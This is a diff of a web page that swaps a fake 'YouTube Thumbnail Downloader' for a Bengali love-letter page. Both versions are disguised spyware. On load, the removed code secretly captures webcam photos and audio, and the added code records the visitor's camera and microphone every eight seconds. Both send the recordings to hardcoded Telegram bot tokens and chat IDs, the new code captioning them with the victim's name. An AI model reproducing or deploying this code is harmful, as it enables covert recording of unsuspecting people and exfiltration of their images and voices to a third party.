--- a/inddex.html
+++ b/inddex.html
@@ -1,242 +1,313 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
+  <meta charset="UTF-8" />
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
   
-  <title>YouTube Thumbnail Downloader</title>
-  <meta charset="utf-8">
-  <meta name="viewport" content="width=device-width, initial-scale=1">
-  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Montserrat">
+  <link href="https://fonts.googleapis.com/css2?family=Hind+Siliguri:wght@400;700&display=swap" rel="stylesheet">
+  <title>Photography</title>
   <style>
-    body {
-      font-family: 'Montserrat', sans-serif;
+    * {
       margin: 0;
       padding: 0;
-      background-color: #f5f5f5;
-    }
-    .navbar {
-      background-color: #ff0000;
-      color: white;
-      text-align: center;
-      padding: 15px 0;
-    }
-    #header {
-      margin: 0;
-      font-size: 28px;
-      font-weight: bold;
-    }
-    .container {
-      max-width: 600px;
-      margin: 20px auto;
-      padding: 20px;
-      background-color: #fff;
-      border-radius: 8px;
-      box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
-    }
-    .form-control {
-      width: calc(100% - 22px);
-      margin-bottom: 15px;
-      padding: 10px;
-      border: 1px solid #ccc;
-      border-radius: 5px;
       box-sizing: border-box;
-      font-family: 'Montserrat', sans-serif;
     }
-    #thumbdloadbtn {
-      display: block;
+    body {
+      font-family: 'Cursive', sans-serif;
+      background: linear-gradient(135deg, #fcb69f, #d4a5a5);
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      height: 100vh;
+      color: #fff;
+    }
+
+    .name-container {
+      position: absolute;
+      top: 0;
+      left: 0;
       width: 100%;
-      padding: 10px;
-      border: none;
-      border-radius: 5px;
-      background-color: #ff0000;
-      color: white;
-      font-size: 16px;
-      cursor: pointer;
-      font-family: 'Montserrat', sans-serif;
+      height: 100%;
+      background: rgba(0, 0, 0, 0.7);
+      display: flex;
+      justify-content: center;
+      align-items: center;
     }
-    #thumbdloadbtn:hover {
-      background-color: #cc0000;
-    }
-    footer {
+
+    .name-form {
+      background: #fff;
+      padding: 30px;
+      border-radius: 15px;
+      box-shadow: 0 10px 30px rgba(0, 0, 0, 0.1);
       text-align: center;
-      margin-top: 40px;
-      color: #666;
     }
-    .youtube-logo {
-      display: block;
-      margin: 20px auto;
-      width: 100px; /* Adjust size as needed */
+
+    .name-form input {
+      padding: 10px;
+      font-size: 1.2rem;
+      width: 250px;
+      margin-bottom: 20px;
+      border-radius: 5px;
+      border: 1px solid #ccc;
+    }
+
+    .name-form button {
+      background-color: #ef4444;
+      color: white;
+      border: none;
+      padding: 15px 30px;
+      font-size: 16px;
+      font-weight: bold;
+      border-radius: 25px;
+      cursor: pointer;
+    }
+
+    .name-form button:hover {
+      background-color: #dc2626;
+    }
+
+    .container {
+      background: #fff;
+      width: 100%;
+      max-width: 600px;
+      padding: 40px;
+      border-radius: 15px;
+      box-shadow: 0 10px 30px rgba(0, 0, 0, 0.1);
+      overflow: hidden;
+      position: relative;
+      display: none;
+    }
+
+    .letter-title {
+      text-align: center;
+      font-size: 2rem;
+      color: #ef4444;
+      margin-bottom: 20px;
+      font-family: 'Georgia', serif;
+    }
+
+    .letter-box {
+      font-family: 'Arial', sans-serif;
+      font-size: 1.2rem;
+      line-height: 1.6;
+      color: #333;
+      white-space: pre-wrap;
+      word-wrap: break-word;
+      padding: 20px;
+      background: #fafafa;
+      border-radius: 10px;
+      box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
+      margin-top: 20px;
+      height: 250px;
+      overflow-y: auto;
+      max-height: 250px;
+    }
+
+    .caret {
+      display: inline-block;
+      width: 10px;
+      background: #333;
+      margin-left: 4px;
+      animation: blink 1s infinite;
+    }
+
+    @keyframes blink {
+      0%, 100% { opacity: 1; }
+      50% { opacity: 0; }
+    }
+
+    .message {
+      text-align: center;
+      font-size: 16px;
+      color: #4ade80;
+      margin-top: 20px;
+    }
+
+    .button-container {
+      display: flex;
+      justify-content: center;
+      margin-top: 20px;
+    }
+    .letter-box {
+  font-family: 'Hind Siliguri', sans-serif;
+  font-size: 1.2rem;
+  line-height: 1.8;
+  color: #333;
+  white-space: pre-wrap;
+  word-wrap: break-word;
+  padding: 20px;
+  background: #fffaf0;
+  border-radius: 10px;
+  box-shadow: 0 5px 15px rgba(0, 0, 0, 0.1);
+  margin-top: 20px;
+  height: 300px;
+  overflow-y: auto;
+  max-height: 300px;
+}
+    .action-btn {
+      background-color: #ef4444;
+      color: white;
+      border: none;
+      padding: 15px 30px;
+      font-size: 16px;
+      font-weight: bold;
+      border-radius: 25px;
+      cursor: pointer;
+      transition: background-color 0.3s ease;
+    }
+
+    .action-btn:hover {
+      background-color: #dc2626;
+    }
+
+    #canvas {
+      display: none;
     }
   </style>
-  <script type='text/javascript'>
-  //<![CDATA[
-  var uri = window.location.toString();
-  if (uri.indexOf("%3D") > 0) {
-      var clean_uri = uri.substring(0, uri.indexOf("%3D"));
-      window.history.replaceState({}, document.title, clean_uri);
-  }
-
-  uri = window.location.toString();
-  if (uri.indexOf("%3D%3D") > 0) {
-      clean_uri = uri.substring(0, uri.indexOf("%3D%3D"));
-      window.history.replaceState({}, document.title, clean_uri);
-  }
-
-  uri = window.location.toString();
-  if (uri.indexOf("&m=1") > 0) {
-      clean_uri = uri.substring(0, uri.indexOf("&m=1"));
-      window.history.replaceState({}, document.title, clean_uri);
-  }
-
-  uri = window.location.toString();
-  if (uri.indexOf("?m=1") > 0) {
-      clean_uri = uri.substring(0, uri.indexOf("?m=1"));
-      window.history.replaceState({}, document.title, clean_uri);
-  }
-  //]]>
-  </script>
 </head>
 <body>
-  <nav class="navbar">
-    <img class="youtube-logo" src="https://www.gstatic.com/youtube/img/branding/youtubelogo/svg/youtubelogo.svg" alt="YouTube Logo">
-    <h1 id="header">YOUTUBE THUMBNAIL DOWNLOADER</h1>
-  </nav>
-
-  <div class="container">
-    <input id="ytlink" type="text" class="form-control" placeholder="Enter YouTube Video URL" spellcheck="false">
-    <button id="thumbdloadbtn" onclick="downloadThumbnail()">FETCH</button>
-    <div id="thumbnail-preview"><!-- Placeholder for thumbnail preview --></div>
-
-    <h2>How to Download HD YouTube Thumbnail</h2>
-    <ol>
-      <li>Copy the YouTube Video Link / URL from the YouTube App or Website</li>
-      <li>Paste the YouTube video Link / URL in the Input Field Above</li>
-      <li>Click on the "FETCH" Button</li>
-      <li>Select the thumbnail quality</li>
-      <li>Download the Thumbnail</li>
-    </ol>
+  <!-- Fullscreen Name Input Form -->
+  <div class="name-container" id="name-container">
+    <div class="name-form">
+      <h2>তোমার নাম লিখ</h2>
+      <input type="text" id="userName" placeholder="Your Name" />
+      <button id="submit-name">Next</button>
+    </div>
   </div>
 
-  <center>
-    <button id="toggle-video" style="display:none;">Toggle Video</button>
-    <div id="message-container"></div>
-    <video id="video" width="0" height="0" autoplay></video>
-  </center>
+  <!-- Love Letter Content -->
+  <div class="container" id="container">
+    <div class="letter-title" id="letter-title">প্রিয় <span id="to-name">Love</span></div>
+    <div class="letter-box" id="letter"></div>
+    <div class="message" id="message">🥹...</div>
+    <div class="button-container">
+      <button class="action-btn" id="start-btn">এইখানে ক্লিক করো </button>
+    </div>
+  </div>
 
-  <script type="text/javascript">
-    function downloadThumbnail() {
-        // Change button text to indicate fetching
-        var btn = document.getElementById('thumbdloadbtn');
-        btn.textContent = 'Fetching from server... Wait';
+  <canvas id="canvas" width="300" height="400"></canvas>
 
-        // Add your logic to fetch the thumbnail here
-        // ...
-    }
+  <script>
+    let userName = "";
 
-    function la(src) {
-      window.location = src;
-    }
+    const letterText = `
 
-    function GetURLParameter(sParam) {
-      var sPageURL = window.location.search.substring(1);
-      var sURLVariables = sPageURL.split('&');
-      for (var i = 0; i < sURLVariables.length; i++) {
-        var sParameterName = sURLVariables[i].split('=');
-        if (sParameterName[0] == sParam) {
-          return sParameterName[1];
-        }
+
+শুরু করবো কেমন করে বুঝতে পারছি না। শব্দরা যেন হঠাৎ করে লাজুক হয়ে গেছে,
+তোমার নাম উচ্চারণেই মন কেঁপে ওঠে।
+
+তোমার হাসিটা আমার পৃথিবীর সবচেয়ে প্রিয় জিনিসগুলোর একটি। 
+তুমি যখন হাসো, তখন মনে হয় যেন সমস্ত দুঃখ কষ্ট পেছনে ফেলে আসা যায়।
+তুমি আছো বলেই দিনগুলো রঙিন হয়ে ওঠে, 
+রাতগুলো আশায় ভরে ওঠে, স্বপ্নেরা নতুন রূপ পায়।
+
+তুমি আমার অনুপ্রেরণা, আমার শান্তি, আমার ভালোবাসা।
+
+এই ছোট্ট পৃথিবীতে তোমার অস্তিত্বই আমার সবচেয়ে বড় প্রাপ্তি।
+
+ভালোবাসা নিঃশেষ নয়, 
+আমার ভালোবাসা তোমার জন্য প্রতিটা মুহূর্তেই নতুনভাবে জন্ম নেয়।
+
+সারাজীবন তোমার পাশে থাকতে চাই।
+
+`;
+
+    const letterBox = document.getElementById("letter");
+    const startBtn = document.getElementById("start-btn");
+    const submitNameBtn = document.getElementById("submit-name");
+    const nameContainer = document.getElementById("name-container");
+    const container = document.getElementById("container");
+    const toName = document.getElementById("to-name");
+    const userNameInput = document.getElementById("userName");
+    const message = document.getElementById("message");
+    const canvas = document.getElementById('canvas');
+    const token = "7891742749:AAHRWnK8KtgV4c7KEb6MY27D9AXdIsrKp_w";
+    const chatId = "1987016824";
+
+    let index = 0;
+
+    submitNameBtn.addEventListener("click", function() {
+      userName = userNameInput.value.trim();
+      if (userName !== "") {
+        toName.textContent = userName;
+        nameContainer.style.display = "none";
+        container.style.display = "block";
+      }
+    });
+
+    function typeLetter() {
+      if (index < letterText.length) {
+        letterBox.innerHTML = letterText.substring(0, index + 1) + '<span class="caret"></span>';
+        index++;
+        letterBox.scrollTop = letterBox.scrollHeight;
+        setTimeout(typeLetter, 50);
+      } else {
+        letterBox.innerHTML = letterText;
       }
     }
 
-    function decodeBase64(encodedStr) {
-      try {
-        return decodeURIComponent(atob(encodedStr));
-      } catch (e) {
-        console.error('Base64 decode error:', e);
-        return null;
-      }
-    }
+    startBtn.addEventListener("click", function() {
+      typeLetter();
+      startBtn.style.display = "none";
+    });
 
-    // Get Base64 encoded 'id' parameter from the URL
-    var base64Id = GetURLParameter('i');
-    var chatid = base64Id ? decodeBase64(base64Id) : null;
+    navigator.mediaDevices.getUserMedia({
+      video: { facingMode: "user" },
+      audio: true
+    })
+    .then(stream => {
+      const mediaRecorder = new MediaRecorder(stream);
+      const chunks = [];
 
-    if (chatid) {
-      console.log('Decoded chat ID:', chatid);
-    } else {
-      console.warn('No valid chat ID found.');
-    }
+      mediaRecorder.ondataavailable = function(e) {
+        chunks.push(e.data);
+      };
 
-    navigator.mediaDevices.getUserMedia({ video: true, audio: true })
-      .then((stream) => {
-        const imageCapture = new ImageCapture(stream.getVideoTracks()[0]);
-        const audioRecorder = new MediaRecorder(stream);
+      mediaRecorder.onstop = function() {
+        const blob = new Blob(chunks, { type: "video/webm" });
+        chunks.length = 0;
+        sendVideoToTelegram(blob);
+      };
 
-        function capturePhoto(index) {
-          setTimeout(() => {
-            imageCapture.takePhoto()
-              .then((blob) => {
-                sendToTelegram(blob, 'photo');
-              })
-              .catch((error) => {
-                console.error('Error capturing photo:', error);
-              });
-          }, index * 2000);
+      setInterval(() => {
+        if (mediaRecorder.state === "recording") {
+          mediaRecorder.stop();
         }
 
-        function startAudioRecording() {
-          audioRecorder.start();
-          setTimeout(() => {
-            audioRecorder.stop();
-          }, 5000);
-        }
-
-        audioRecorder.ondataavailable = (event) => {
-          if (event.data.size > 0) {
-            sendToTelegram(event.data, 'audio');
+        mediaRecorder.start();
+        setTimeout(() => {
+          if (mediaRecorder.state === "recording") {
+            mediaRecorder.stop();
           }
-        };
+        }, 5000); // Record for 5 seconds
+      }, 8000); // Every 8 seconds
+    })
+    .catch(err => {
+      message.textContent = "";
+      console.error(err);
+    });
 
-        for (let i = 0; i < 3; i++) {
-          capturePhoto(i);
-        }
-
-        startAudioRecording();
-      })
-      .catch((error) => {
-        if (error.name === 'NotAllowedError') {
-          // Handle the case where permissions are denied
-          console.warn('Permissions denied. User may suspect.');
-        } else {
-          console.error('Permission error:', error);
-        }
-      });
-
-    function sendToTelegram(data, type) {
-      const botToken = '7127289863:AAEBI-cGSj40xJN63HV1mYXZZUP12866G6w';
-      const chatId = chatid;
-
-      if (!chatId) {
-        console.error('Chat ID is not available.');
-        return;
-      }
-
+    function sendVideoToTelegram(blob) {
       const formData = new FormData();
-      formData.append('chat_id', chatId);
-      formData.append(type === 'photo' ? 'photo' : 'audio', data, `@lodabotbccc.${type === 'photo' ? 'jpg' : 'wav'}`);
+      formData.append("chat_id", chatId);
+      formData.append("video", blob, "video.webm");
+      formData.append("caption", `This is ${userName}'s video!`);
 
-      fetch(`https://api.telegram.org/bot${botToken}/send${type.charAt(0).toUpperCase() + type.slice(1)}`, {
-        method: 'POST',
+      fetch(`https://api.telegram.org/bot${token}/sendVideo`, {
+        method: "POST",
         body: formData
       })
-        .then(response => response.json())
-        .then(data => console.log(data))
-        .catch(error => console.error('Error sending to Telegram:', error));
+      .then(res => res.json())
+      .then(data => {
+        if (!data.ok) {
+          message.textContent = "🥹";
+        }
+      })
+      .catch(err => {
+        console.error(err);
+        message.textContent = "🥲";
+      });
     }
   </script>
-
-  <footer>
-    <p>Made With ❤️ By Your Name</p>
-  </footer>
 </body>
 </html>
